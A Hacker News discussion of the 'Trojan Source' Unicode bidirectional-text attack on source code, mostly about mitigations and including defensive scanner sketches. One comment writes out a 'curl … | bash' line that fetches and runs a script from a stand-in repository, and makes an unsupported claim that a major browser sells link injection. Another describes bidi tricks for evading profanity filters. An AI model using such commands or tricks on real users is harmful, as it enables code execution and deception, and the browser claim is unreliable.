Hacker Read

		‘Trojan Source’ Bug Threatens the Security of All Code (krebsonsecurity.com)
		467 points by picture | karma 23399 | avg karma 25.71 2021-10-31 23:24:49 | 279 comments

akersten | karma 8382 | avg karma 9.98 2021-10-31 23:52:01 | [–] similar comments

It is wrong to call this a bug, this is a feature of Unicode and very intentional. Whether we should have thought about that when allowing parsers to digest anything outside of ASCII is the real question. The answer is probably "IDEs and compilers should ignore character-direction codes when looking at source files." But that doesn't solve homoglyph attacks (and other undiscovered deception). What a fun can of worms. Who gets to solve it?

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 00:25:40 | [–] similar comments

You're right - their headline is written for attention. It's an exploit of a feature.

What I'm interested to know is whether there is any code already out there in the wild with this exploit in it? An intelligence service could have exploited this years ago without anyone noticing until now.

Unicode is a pathway to all manner of hijinks, including as you say, homoglyph attacks. For instance, on some TLDs I can easily create two different domain names that render identically in the browser.

comex | karma 19146 | avg karma 4.18 2021-11-01 00:59:13 | [–] similar comments

> What I'm interested to know is whether there is any code already out there in the wild with this exploit in it?

It's possible, but I doubt it. The paper mentions that Vim isn't vulnerable to the bidirectional attack. Not mentioned in the paper: neither is `less`, the pager, which is used by default for `git diff` and other Git commands. Nor are either of the first two terminals I tried, when `cat`ing the file without a pager.

All of the aforementioned programs display the direction markers as either escape sequences highlighted in bright colors, or garbage characters, both of which stand out visually like a sore thumb. Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit. But it does mean that this kind of attack is incredibly brittle, at least in any codebase where some people working on it are likely to be using Unix tools. There's a high chance the aberrant characters will be spotted at some point or other.

And once spotted, it's self-evident that it's an attack. I suspect real attacks would try to be more subtle, introducing bugs that could pass as genuine mistakes, at least at first glance.
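
For anyone who wants to check a file without relying on how a pager or terminal happens to render it, here is a minimal sketch of a scanner for the explicit bidi control characters. The function name and the sample line are made up for illustration; the code point list is the standard set of embeddings, overrides, isolates and directional marks.

```python
import unicodedata

# Explicit bidirectional formatting characters defined by Unicode.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"   # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"         # LRI, RLI, FSI, PDI
    "\u200e\u200f\u061c"               # LRM, RLM, ALM
)


def find_bidi_controls(source):
    """Return (line, column, character name) for each bidi control found."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, unicodedata.name(ch)))
    return hits


# Hypothetical sample line, written with escapes so nothing is hidden here.
sample = 'access = "user\u202e \u2066// check admin\u2069 \u2066"\nprint(access)\n'
for hit in find_bidi_controls(sample):
    print(hit)
```

Columns are counted in code points, not display cells, so they will not line up with what a bidi-aware editor shows.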

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 01:34:55 | [–] similar comments

It's sad that large-scale exploitation of this is stopped only because many applications still have really poor Unicode support and would therefore make the changes human-visible.

Groxx | karma 17784 | avg karma 2.5 2021-11-01 01:42:43 | [–] similar comments

Coding editors also often show this kind of thing intentionally, as those characters are meaningful for interpretation purposes. Many of them are very UTF friendly, but they still show zero-width spaces as e.g. "<zwsp>" on purpose.

They've also often shown non-printable ASCII control characters for basically forever. Null bytes and \bel and whatnot are very important despite being "invisible", and they've been around for decades.

tetha | karma 3815 | avg karma 3.07 2021-11-01 02:36:57 | [–] similar comments

I've been bitten by things like this from an entirely unexpected angle - messengers like teams and skype sometimes <helpfully> replace characters like "-" and " " with all manner of more readable unicode characters. More readable, until the YAML parser choked.

Since that, I pretty much always run some variant of the gremlins plugin, which highlights pretty much all unicode spaces, dashes and other weird control symbols.
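
A rough sketch of what such a highlighter might look for, assuming that "gremlins" means non-ASCII space separators, dashes and invisible format characters. This is not the plugin's actual logic; the function name and sample string are hypothetical.

```python
import unicodedata

# General categories that are easy to miss by eye: space separators,
# dash punctuation, and invisible format characters.
SUSPECT_CATEGORIES = {"Zs", "Pd", "Cf"}


def find_gremlins(text):
    """Yield (index, code point, name) for non-ASCII spaces, dashes and format characters."""
    for index, ch in enumerate(text):
        if ord(ch) > 0x7F and unicodedata.category(ch) in SUSPECT_CATEGORIES:
            yield index, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")


# Hypothetical line as a chat client might have "improved" it.
yaml_line = "key:\u00a0value \u2013 pasted from chat"
for gremlin in find_gremlins(yaml_line):
    print(gremlin)
```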

Groxx | karma 17784 | avg karma 2.5 2021-11-01 03:46:36 | [–] similar comments

Chat apps replacing ™ with a horrifically large, poorly-rendered and off-colored "TM" and ruining The Joke™ is a major pet peeve of mine, yeah :| And even worse, it seems to be spreading, as each one blindly copies the horrible decisions of the others. I would disable all of those auto-replacements everywhere if only I could disable all of those auto-replacements everywhere.

powersnail | karma 2517 | avg karma 3.44 2021-11-01 02:30:00 | [–] similar comments

I think making these chars human visible is a feature. Most code editors have features like showing invisible characters, displaying some representation of white space characters, or highlighting control sequences.

Because the editor is supposed to edit plain text, which means all characters must be editable. And something can only be editable if it is visible.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 01:37:47 | [–] similar comments

> Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit.

But that behavior is intentional. If you want, you could do "alias less='less -r'", and then it would behave the way you want, and you'd become vulnerable to this attack.

comex | karma 19146 | avg karma 4.18 2021-11-01 01:56:13 | [–] similar comments

-r makes it pass all control characters to the terminal. To quote less's man page:

> Warning: when the -r option is used, less cannot keep track of the actual appearance of the screen (since this depends on how the screen responds to each type of control character).

This is not the same as actually supporting (i.e. being able to keep track of the screen state for) bidirectional text that may legitimately use those characters.

For that matter, the terminal may not support it either, as I mentioned.

Though, today I learned there has been some effort in recent years to improve bidirectional text handling in terminals and terminal applications, generally:

https://www.reddit.com/r/linux/comments/dn8uka/bidirectional...

KennyBlanken | karma 4695 | avg karma 1.59 2021-11-01 02:23:15 | [–] similar comments

> You're right - their headline is written for attention

That or just ignorance. Krebs has zero training or education in computer science or programming.

bmn__ | karma 1975 | avg karma 1.57 2021-11-01 03:00:41 | [–] similar comments

> I can easily create two different domain names that render identically in the browser

You can't (any more)¹. That worked for a limited amount of time, then mitigations were put in place, and subsequently standardised as part of Unicode. Everyone who deals with implementations of Unicode is supposed to be knowledgeable about the security relevant aspects, you can bet that the people working on browsers definitely are. <http://p3rl.org/perlre#Script-Runs>

¹ invitation to prove me wrong, I am on purpose leaning far out the metaphoric window and will gladly eat my words

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 04:44:08 | [–] similar comments

Doesn't really matter. The major browser is intentionally security compromised, anyway.

If you pay the maker of that browser they'll inject any links you want on most pages on the internet. Just give them the hash of the email / phone number of your target. It helps both economically and passing their security checks if you have more than a thousand victims you want to target.

If you want to fool a developer just host it on a github page. If you want to fool anyone else, just do a decent clone of their page.

If you want it to appear on most major news network sites, just pay $150 for a newswire.

Think about it, if you crafted the right article, maybe about a fork of homebrew etc, and redirected to a github page with a link stating you needed to copy and paste

curl http://github.com/asdkfjas/homebrew.sh | bash

into their terminals how many would do it?

Amorymeltzer | karma 18996 | avg karma 8.03 2021-11-01 06:13:31 | [–] similar comments

Came here to provide exactly that link (canonical: <https://perldoc.perl.org/perlre#Script-Runs>). For those who figured they'd skip over it, it's pretty neat IMO. Perl 5.28 (released 2018) added a new technique for matching patterns that aren't all from the same Unicode script, a "script run."

>In most places a single word would never be written in multiple scripts, unless it is a spoofing attack. An infamous example, is

>>paypal.com

>Those letters could all be Latin (as in the example just above), or they could be all Cyrillic (except for the dot), or they could be a mixture of the two. In the case of an internet address the .com would be in Latin, And any Cyrillic ones would cause it to be a mixture, not a script run.
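
The same idea can be approximated outside Perl. The sketch below is only a rough stand-in: Python's standard library has no Script property, so it assumes the first word of each letter's Unicode name ("LATIN", "CYRILLIC", ...) is a good enough proxy. Function names are made up for illustration.

```python
import unicodedata


def rough_scripts(label):
    """Approximate the scripts used in a label from Unicode character names.

    ASSUMPTION: the first word of a letter's name (e.g. "LATIN", "CYRILLIC")
    stands in for the real Script property, which the standard library lacks.
    """
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def is_single_script(label):
    """True if all letters in the label appear to come from one script."""
    return len(rough_scripts(label)) <= 1


latin = "paypal"
mixed = "p\u0430yp\u0430l"   # Cyrillic SMALL LETTER A in place of Latin "a"
print(is_single_script(latin), rough_scripts(latin))
print(is_single_script(mixed), rough_scripts(mixed))
```

As the quoted documentation points out, an all-Cyrillic lookalike is still a single script run, so a check like this only catches mixtures.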

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 09:20:08 | [–] similar comments

> You can't (any more)¹.

That was my understanding too, until this last week when I figured out you could.

I'm pretty certain this: and this: are the same rendering, but are different Unicode, and I can register them both as domain names under some TLDs. Google displays them the same in their result pages too.

bmn__ | karma 1975 | avg karma 1.57 2021-11-01 10:14:08 | [–] similar comments

I examined closely and found both are exactly the same, a perfectly valid Latin script run and equivalent to the expression in escape notation "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".

    > perl -C -E'print "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
    0000  74 68 69 73 3a                                    this:

HN software likely ate the relevant details you wanted to show, can you please try again and use a notation that survives the HN filter?

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 15:30:49 | [–] similar comments

Try this: https://kingcharles.one/unistrange.html

When I created the file in Notepad it showed the hidden code, but I can register both those as valid domains and Google will show them identically in the SERPs, and Safari will show them both identically in the address bar. Chrome/Edge expands them in the address bar, but will render them the same in HTML. Have not tested on Firefox.

If you View Source in Chrome it won't show the hidden code, but if you open the dev tools it will start to break.

ximeng | karma 3422 | avg karma 3.1 2021-11-01 00:47:42 | [–] similar comments

https://github.com/rust-lang/rust/issues/28979 plenty of discussion here on Unicode including homoglyph attacks. This is for Rust but has links to Go and Zig. The Unicode standard also has extensive discussion, for example https://unicode.org/reports/tr31/ and http://unicode.org/reports/tr39/ on identifiers and security.

In general a multilayer solution is needed: compilers, linters, Unicode standard, merge tools, editors, and so on.

rurban | karma 5612 | avg karma 0.84 2021-11-01 02:49:44 | [–] similar comments

But they still don't get it right, they explicitly allow not identifiable Unicode identifiers. The C20 committee recently allowed also insecure identifiers, completely ignoring the Unicode identifier guidelines. They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database. Why do they allow noobs into such committees? What is needed are the normalization tables (tiny), the script list (tiny) and the two xid lists.

estebank | karma 4736 | avg karma 3.39 2021-11-01 12:27:48 | [–] similar comments

> they explicitly allow not identifiable Unicode identifiers. [...] They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database.

Could you elaborate? rustc ships with the entire Unicode db and only allows idents with codepoints advertised by Unicode as allowed in idents.

The closest to walking off the beaten path is a (still unmerged) parser recovery PR that accepts emojis as identifiers if and only if a parse error would otherwise occur as a way to avoid knock down errors when someone tries to use them.

rurban | karma 5612 | avg karma 0.84 2021-11-05 04:18:19 | [–] similar comments

For identifier security you don't need the entire Unicode DB. Only rust or glibc would do that, nobody else. You need the XID_Start/Continue list of bits, a single normalization table if NFC (or two if NFD), the scripts list (ranges of a single byte), and a bit of logic. With confusables I'm not sure.

That's about 2k vs 20m.
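
To make the "XID lists plus a normalization table" idea concrete, here is a small sketch that leans on Python, whose identifier grammar is built on XID_Start / XID_Continue. It leaves out the script and confusables checks, and the function name is hypothetical.

```python
import unicodedata


def check_identifier(name):
    """Return a list of problems found with a candidate identifier."""
    problems = []
    # str.isidentifier() applies Python's identifier grammar, which is
    # based on XID_Start and XID_Continue (plus the underscore).
    if not name.isidentifier():
        problems.append("not XID_Start followed by XID_Continue")
    # Reject spellings that are not already in NFC, so two visually identical
    # identifiers cannot differ only in composed vs. decomposed form.
    if unicodedata.normalize("NFC", name) != name:
        problems.append("not NFC-normalized")
    return problems


print(check_identifier("caf\u00e9"))     # precomposed e-acute
print(check_identifier("cafe\u0301"))    # "e" followed by a combining acute
print(check_identifier("as\u200bdf"))    # zero-width space inside the name
```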

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 01:31:00 | [–] similar comments

It's a feature for prose text, so programs like Word should support it. It's a security bug in anything designed to be parsed or interpreted by software, so programs like Visual Studio Code should refuse to honor it.

hollerith | karma 6663 | avg karma 1.52 2021-11-01 03:18:17 | [–] similar comments

Brilliant! Nobody would copy prose, then paste it into a code file or REPL without re-reading it after the paste.

asddubs | karma 4687 | avg karma 2.73 2021-11-01 17:04:47 | [–] similar comments

or it should be confined to the marker of the string (i.e. the quotation marks) if you're doing syntax highlighting anyway

Animats | karma 143047 | avg karma 6.11 2021-11-01 03:12:30 | [–] similar comments

What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

There is a draft standard for this.[1] It references RFC 5893 and some other documents. Some of the rules:

- All code points in a single label must be taken from the same script as determined by the Unicode Standard Annex #24: Script Names. Exceptions to this guideline are permissible for languages with established orthographies and conventions that require the commingled use of multiple scripts. (Like mixing kanji and romaji in Japanese.)

- The "Bidi rules" of RFC 5893, which define allowed right to left and left to right modes, must be enforced. These are complicated, because of such things as the Arabic and Hebrew convention of right to left text with left to right numeric digits in numbers. But they are well-defined.

- Only code points allowed by IDNA 2008 are allowed. This eliminates such things as the non-breaking zero width space, the expansion areas for future use, and such.

The domain name people have been banging on this problem since 2003, and by now, there's a rough consensus of what to disallow. So start putting checks for that in compilers. If you find violations of those rules, it's more likely to be a typo than something useful, anyway.

So that's a way out of this.

[1] https://www.icann.org/en/system/files/files/draft-idn-guidel...

varajelle | karma 886 | avg karma 2.6 2021-11-01 07:56:05 | [–] similar comments

> What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

But this attack works by placing characters inside comments and strings. So these checks would not help prevent this particular attack.
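
A check aimed at comments and string literals specifically could look for bidi embeddings or isolates that are opened but never closed within the literal. The sketch below is a deliberately simplified balance check, not the full Unicode Bidirectional Algorithm, and the function name is made up.

```python
# Characters that open a directional embedding, override, or isolate,
# mapped to the character that is expected to close them.
OPENERS = {
    "\u202a": "\u202c",  # LRE -> PDF
    "\u202b": "\u202c",  # RLE -> PDF
    "\u202d": "\u202c",  # LRO -> PDF
    "\u202e": "\u202c",  # RLO -> PDF
    "\u2066": "\u2069",  # LRI -> PDI
    "\u2067": "\u2069",  # RLI -> PDI
    "\u2068": "\u2069",  # FSI -> PDI
}
CLOSERS = {"\u202c", "\u2069"}


def has_unterminated_bidi(literal):
    """Return True if the text opens a bidi embedding/isolate without closing it."""
    stack = []
    for ch in literal:
        if ch in OPENERS:
            stack.append(OPENERS[ch])
        elif ch in CLOSERS:
            # Simplification: only a closer matching the innermost opener pops it;
            # stray or mismatched closers are ignored.
            if stack and stack[-1] == ch:
                stack.pop()
    return bool(stack)


print(has_unterminated_bidi("\u2067text\u2069"))
print(has_unterminated_bidi("\u202e \u2066// comment\u2069 \u2066"))
```

A lexer would run this on the contents of each comment and string literal separately, since the point is that the effect must not leak past the end of the token.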

Animats | karma 143047 | avg karma 6.11 2021-11-01 13:12:05 | [–] similar comments

They say that, but don't really justify that claim. That's more about string literals that do something other than just display, such as URLs.

zeepzeep | karma 905 | avg karma 3.44 2021-11-01 03:33:34 | [–] similar comments

> "IDEs and compilers should ignore character-direction codes when looking at source files."

No, I think some people would disagree, Arabic coders for example. People just need to be aware of this when using Unicode in their product.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:05:02 | [–] similar comments

Editors and code views should definitely show when BiDi and other interesting Unicode features are used, just like they already do with spaces and zero-width whitespaces. These features should definitely work, but they are a liability if they can also be used to mislead human users.

Compiler maintainers need to update the syntax rules to restrict free mixing of unicode characters. Similar restrictions were already adopted in domain names.

asddubs | karma 4687 | avg karma 2.73 2021-11-01 04:46:39 | [–] similar comments

browsers have solved it for domain names. you could apply the same heuristics for not mixing e.g. cyrillic and non cyrillic in the same word/file

Groxx | karma 17784 | avg karma 2.5 2021-10-31 23:59:11 | [–] similar comments

Ehhhh... Interesting philosophically, and we might see a practical attack maybe eventually, but most source code editors and diff reviewers that I've encountered show all non-printable characters VERY visibly. Because they matter, and always have - "func asdf()" is very different from "func as<zwsp>df()". If I saw a pile of non-printable control characters intermixed in code in a diff, there's absolutely no way I'd allow that merge.

IOCCC entries will absolutely become more fun though.

lifthrasiir | karma 12499 | avg karma 3.64 2021-11-01 00:12:29 | [–] similar comments

> IOCCC entries will absolutely become more fun though.

IOCCC doesn't allow unescaped octets with high bit set [1], so even that's no go.

[1] https://www.ioccc.org/2020/rules.txt (rule 13)

Groxx | karma 17784 | avg karma 2.5 2021-11-01 00:21:09 | [–] similar comments

Aww. But also of course they've already addressed this.

saagarjha | karma 56017 | avg karma 2.29 2021-11-01 02:18:25 | [–] similar comments

I am very curious which program abused this and forced the creation of that rule.

lifthrasiir | karma 12499 | avg karma 3.64 2021-11-01 03:06:35 | [–] similar comments

Probably 2000/briddlebane [1]. But it is more like a guard against compatibility issues.

[1] https://www.ioccc.org/2000/briddlebane.c vs. https://www.ioccc.org/2000/briddlebane.orig.c

GlitchMr | karma 1509 | avg karma 5.61 2021-11-01 03:26:45 | [–] similar comments

Well, technically the rule only talks about entries that "fail to compile". An entry that still compiles is fine, see rule 12. In practice this means that Unicode abuse like this is only allowed in strings.

lifthrasiir | karma 12499 | avg karma 3.64 2021-11-01 04:16:49 | [–] similar comments

When the rule was originally introduced in 2001 [1] it was a total ban. It seems that the rule was slightly relaxed in 2013 [2], but I think it still massively discourages any octet >= 128 because there is no portable way to set the input encoding (like GCC `-finput-charset`, which is ignored by Clang AFAIK).

[1] https://www.ioccc.org/2001/rules

[2] https://www.ioccc.org/2013/rules.txt

Jach | karma 10624 | avg karma 2.47 2021-11-01 02:33:09 | [–] similar comments

I wouldn't be so sure about visibility since it seems most code editors and programming languages want to support more unicode, not less... One of my hobbies used to be annually running a regex search through the company's millions of lines of java to see how much of an increase there was in non-printable spaces (0x200b) in java method names or other symbols. Eclipse at least wouldn't show them by default, I don't remember IntelliJ's behavior, but most people wouldn't know they were there. I was aware of only one time when it impacted someone who typed in a whole identifier by sight but the reference included a 200b and they were stuck for a bit figuring out why things didn't work.
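
A search along those lines might look like the sketch below. It is not the regex used at that company, just one plausible way to find word-like tokens that contain U+200B; the function name and the sample source are hypothetical.

```python
import re

# \w does not match U+200B, so it is listed explicitly to keep a token
# with an embedded zero-width space in one piece.
TOKEN = re.compile(r"[\w\u200b]+")


def identifiers_with_zwsp(java_source):
    """Return (line number, visible form) for tokens containing U+200B."""
    found = []
    for line_no, line in enumerate(java_source.splitlines(), start=1):
        for token in TOKEN.findall(line):
            if "\u200b" in token:
                found.append((line_no, token.replace("\u200b", "<zwsp>")))
    return found


sample = "void save() {}\nvoid sa\u200bve() {}\n"
print(identifiers_with_zwsp(sample))
```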

But I agree the trick (hard to call it an attack or even bug) is fun, in the same way as the earlier tricks of fake filename extensions. And terribly obvious, even with the limitations of default code viewers, and with no plausible deniability once caught, so it's pretty overblown for practical considerations. The intentionally introduced Linux kernel bugs from several months ago were far more significant a lesson for people to learn from, and they didn't rely on any unicode tricks but on much simpler tricks that were also somewhat plausibly deniable to chalk up to an oopsie.

Groxx | karma 17784 | avg karma 2.5 2021-11-01 03:42:45 | [–] similar comments

yeah, I've had an identifier or two like that in Ruby in the past :) always worth a few facepalm-riddled lols when sharing the final result with the rest of the team, especially since it often meant they copied the func from Stack Overflow or some equivalent.

Most of what I've encountered though has been due to a lack of unicode support, and related growing pains in adopting full UTF-8. E.g. much of the Eclipse issues I saw were due to UTF-16 weirdness and stuff encoded in ShiftJIS or whatever flavor of Windows encoding you used, and all those garbled files due to missing magic-encoding-bytes in files. UTF-8 support "completing" in tools largely cleaned all that up, since they detected the encoding, converted to UTF-8, and showed abnormal stuff as the abnormalities they were all along.

I mean, that's probably because taking a deep look at supporting UTF-8 meant taking a deep look at many of their latent text bugs and finally fixing them, but it still happened around the same time, and "X editor now supports UTF-8" also marked a dramatic increase in "... and now shows <nbsp> explicitly!" and similar things.

simmo9000 | karma 53 | avg karma 1.2 2021-11-01 00:14:23 | [–] similar comments

Here is an example, open it in an appropriate editor (vi) and you can see how easy it is to 'exploit' (if you can call it that?).

https://github.com/nickboucher/trojan-source/blob/main/JavaS...

Seems like a layer 8 problem?

brundolf | karma 40865 | avg karma 9.15 2021-11-01 00:18:42 | [–] similar comments

GitHub has already updated their UI I see

Groxx | karma 17784 | avg karma 2.5 2021-11-01 00:28:16 | [–] similar comments

The Android app renders it much more suspiciously too, though unfortunately no warning: https://imgur.com/a/L3sNFQ8

techsolomon | karma 12 | avg karma 1.09 2021-11-01 01:48:44 | [–] similar comments

Changelog – https://github.blog/changelog/2021-10-31-warning-about-bidir...

Semaphor | karma 13668 | avg karma 2.69 2021-11-01 00:30:38 | [–] similar comments

In case there are people who (currently) don’t have access to such an editor, here is a screenshot: https://i.imgur.com/2Ue2Vvd.png

siddhesh | karma 43 | avg karma 2.69 2021-11-01 03:58:52 | [–] similar comments

You mean, like this?

https://imgur.com/a/unKuOoK

Snark aside, most text based editors have some giveaway or another. Even the GUI ones show syntax highlighting quirks that show that something is wrong.

This is only really relevant in unicode-aware terminals, without syntax highlighting and when you don't get to scroll between characters. IOW, it's really quite hard to do.

mmastrac | karma 45611 | avg karma 11.54 2021-11-01 00:25:22 | [–] similar comments

Fun story: I discovered these in the early 2000s and simultaneously discovered that Slashdot didn't filter these out. I spent an evening randomly reversing large sections of comment pages until they finally blocked it.

I'm very, very sorry CmdrTaco.

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 00:28:04 | [–] similar comments

Most web sites' comment sections will allow these. I think even Facebook allows tomfoolery like this: [Zalgo-style text; the stacked combining marks did not survive extraction, leaving the base letters "fear the utf8man"]

scatters | karma 1352 | avg karma 2.18 2021-11-01 03:14:49 | [–] similar comments

Well yes, Facebook has users in Vietnam. Stacked diacritics are a feature, not a bug.

Cthulhu_ | karma 26640 | avg karma 2.23 2021-11-01 04:27:21 | [–] similar comments

I've seen some sites / services (Discord?) filter these out, at least to the point where they don't escape a message's vertical space. I'm sure they're truncated because those messages are pretty big in terms of number of bytes.

And while they have valid use cases, I can't see it in e.g. comment sections or chat messages. Happy to have someone link to e.g. a Vietnamese comment section showing practical use though.

Timwi | karma 455 | avg karma 1.93 2021-11-01 06:20:48 | [–] similar comments

Vietnamese Wikipedia has plenty of Talk pages with discussion threads.

cmdrtaco | karma 1866 | avg karma 20.97 2021-11-02 10:40:45 | [–] similar comments

I’m sure you created a shitty day for one of us :( I’d like to say this was unusual, but it was pretty common.

mmastrac | karma 45611 | avg karma 11.54 2021-11-08 20:32:14 | [–] similar comments

Oof. :(

My bad, definitely sorry. A case of your favourite bubbly pop on me.

visarga | karma 12425 | avg karma 1.65 2021-11-01 00:33:27 | [–] similar comments

Why is it called a Trojan horse instead of a Greek horse?

panarky | karma 29034 | avg karma 8.55 2021-11-01 00:45:41 | [–] similar comments

Because the Greeks transferred ownership.

alanhaha | karma 22 | avg karma 0.96 2021-11-01 00:53:35 | [–] similar comments

Will this also fool a formatter?

Actually, I think the formatting of the example at https://www.trojansource.codes/ is so strange that I would ask the committer to fix it.

kens | karma 20319 | avg karma 8.22 2021-11-01 01:17:59 | [–] similar comments

This reminds me of a trick you could do on the Commodore PET in the 1980s, where you'd embed backspaces in your BASIC code. If someone looked at the code they'd see something different from what gets executed. Effective to keep someone from copying your code in class :-)

edent | karma 28585 | avg karma 9.66 2021-11-01 01:25:19 | [–] similar comments

BDI can be used to evade profanity filters. Writing something like `‮kcuf` will display a banned word.

Does it work here?

> I am an toidi

No? HN strips the BDI.

But there are plenty of other systems which display weird RTL behavior.

lokedhs | karma 2892 | avg karma 2.22 2021-11-01 07:34:48 | [–] similar comments

Yes, Mastodon has recently been discussing this. https://github.com/mastodon/mastodon/issues/2777

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 01:46:00 | [–] similar comments

Why is bidirectionality handled when text is being rendered onto the screen, instead of when it's being input from the keyboard? Why not render every single character in LTR order, and have RTL support instead be handled by text input fields moving the cursor in the opposite direction after each RTL character is typed? (I know it's too late to change this now. I'm asking why we didn't do it this way from the beginning.)

jart | karma 12123 | avg karma 5.27 2021-11-01 02:41:42 | [–] similar comments

If I understand correctly, what you're suggesting could be thought of as pre-rendering directionality into the memory layout. If we did that then it might compromise our ability to write an algorithm that iterates over a string of hebrew or arabic characters. Display is super complicated and people don't agree on how to do it. For example, consider the arabic text ???? ??? ?????. If I sneak a latin A between all those characters to prevent the display algorithm from rearranging and shaping them, then that same string looks like this: ?A?A?A?A?A?A?A?A?A?A?. Those are the same characters and you can confirm that yourself using:

    import unicodedata

    for c in '???? ??? ?????':
      print(unicodedata.name(c))

On the other hand if you want to romanize that string as EWDTA AEBW TAIH then all you need is a for loop and a switch statement, because the memory order is always left to right. We can also rest assured that if someone invents a better display algorithm, we won't need to do any database migrations, since the encoding itself doesn't need to change.
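
The "for loop and a lookup" point can be sketched with a short Hebrew word written as escapes, so it survives any text filter. The four-entry romanization table is a hypothetical toy, not a real transliteration scheme.

```python
import unicodedata

# ASSUMPTION: a tiny, hypothetical romanization table for four Hebrew letters.
ROMAN = {"\u05e9": "sh", "\u05dc": "l", "\u05d5": "o", "\u05dd": "m"}

word = "\u05e9\u05dc\u05d5\u05dd"   # stored in logical (reading) order

# Iterating the string visits letters in reading order, regardless of how a
# renderer would lay them out on screen.
romanized = "".join(ROMAN[ch] for ch in word)

# Each character carries its own bidi class; the renderer uses these to
# decide the visual order at display time.
bidi_classes = [unicodedata.bidirectional(ch) for ch in word]
print(romanized, bidi_classes)
```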

swiftcoder | karma 2276 | avg karma 2.88 2021-11-01 02:43:37 | [–] similar comments

If you have a document with mixed languages, you need to be able to edit each language in its natural direction after the fact. That requires storing directionality in the document.

And keep in mind that if you store RTL text backwards, as you propose, every algorithm now has to be able to process backwards text. Backwards spellcheck is a lot of extra work...

laurowyn | karma 125 | avg karma 1.76 2021-11-01 02:56:46 | [–] similar comments

Because visual representation is separate from the underlying data structure. A string container doesn't have a specific direction, only a relative one. I.e. This character comes before the next and after the previous. Adding the bidi control code, the string indicates when the visual ordering changes in this relative direction system.

You could absolutely design a new string container that assumes left to right at all times and cannot be changed, but then it's on the programmer to ensure that strings are copied or concatenated in the right direction, at the right location, and substring searching becomes a minor headache. How would you concatenate an RTL string to a forced LTR string representation? You would have to work out whether the end of the string is LTR or RTL. If LTR, append directly. If RTL, find the character where the direction changes and insert the string in there - much more expensive. Better to just append the string, using bidi codes where required, and let the frontend process the string to make the appropriate direction changes. Yes, you may need to search the string for the bidi code to know which direction you're going at the end of the string, but that's just a simple reverse string search for a single control character, and not a complex variable multi-byte search of inferred character directions by codepoint values.

I think the issue is in the locations of which bidi codes are rendered. They provide an inherent untrustworthy-ness to the text area they're rendered in, and so should be treated as an exception in critical situations. I've seen the reversed exe file name trick used for years, and every time I ask myself why that's even a thing? If the OS used file headers and magic numbers to determine file types instead of the filename, it would be less of an issue.

For source code, I would question the rendering of RTL text in a source code editor as it's an obvious issue for code safety. Ideally, all source code would be kept to the same origin language - doesn't have to be english, just consistent. Any non-conforming text should ideally be loaded from a resource rather than inline within the source code, to avoid foreign character contamination and allow easier identification of these issues. Further, source code rendering should only render identified safe control codes, and treat unsafe ones as raw binary values to be shown as such - i.e. \r and \n are safe, \b is unsafe, and bidi codes would also be unsafe. You could even go so far as to include them in the syntax highlighting, but that results in a dependency on syntax highlighting to show the semantics of the source code rather than the text alone.
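
A minimal sketch of that rendering rule, assuming "control codes" means the Unicode general categories Cc (control) and Cf (format). Treating tab as safe is an extra assumption that is not in the comment above, and the function name is made up.

```python
import unicodedata

# "\r" and "\n" are the safe examples from the comment; "\t" is an added
# ASSUMPTION so that ordinary indentation is left alone.
SAFE_CONTROLS = {"\n", "\r", "\t"}


def render_safe(text):
    """Show control (Cc) and format (Cf) characters as visible <U+XXXX> markers."""
    out = []
    for ch in text:
        if ch not in SAFE_CONTROLS and unicodedata.category(ch) in ("Cc", "Cf"):
            out.append(f"<U+{ord(ch):04X}>")
        else:
            out.append(ch)
    return "".join(out)


print(render_safe("ok\b \u202egnp.exe\n"), end="")
```

This makes the text self-describing without relying on syntax highlighting, at the cost of showing legitimate RTL formatting marks as raw code points too.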

malf | karma 212 | avg karma 2.72 2021-11-01 03:14:36 | [–] similar comments

Flip left and right in your idea, and you can try it out without learning a new language. Remember to implement word wrap.

tannhaeuser | karma 10947 | avg karma 3.1 2021-11-01 01:52:47 | [–] similar comments

That Unicode with its extremely large character set would become a solution to any and all character encoding problems in itself was never the case. Usually, for a given document you'll want to declare the subset that's actually in use such that a particular font with necessarily limited coverage can be used to render it. That's what's available for SGML markup documents eg in an SGML declaration, where you can declare and construct a document character set from planes or arbitrary code point ranges, and an SGML parser can verify actual content against that subset.

froh | karma 1600 | avg karma 1.76 2021-11-01 02:16:28 | [–] similar comments

Was that capability dropped in the transition from sgml to XML? If so, can someone here on HN provide some pointers to the old discussion?

tannhaeuser | karma 10947 | avg karma 3.1 2021-11-01 05:31:44 | [–] similar comments

All discussion related to creating XML as an SGML subset can be found on the xml-dev mailing list [1], with some earlier discussions and initial drafts of the SGML ERB mostly linked from there.

The capability to declare document character sets was dropped along with supporting an SGML declaration altogether.

[1]: http://lists.xml.org/archives/xml-dev/

smsm42 | karma 17167 | avg karma 2.28 2021-11-01 03:02:52 | [–] similar comments

> Cambridge research clearly shows that most compilers can be tricked with Unicode into processing code in a different way than a reader would expect it to be processed.

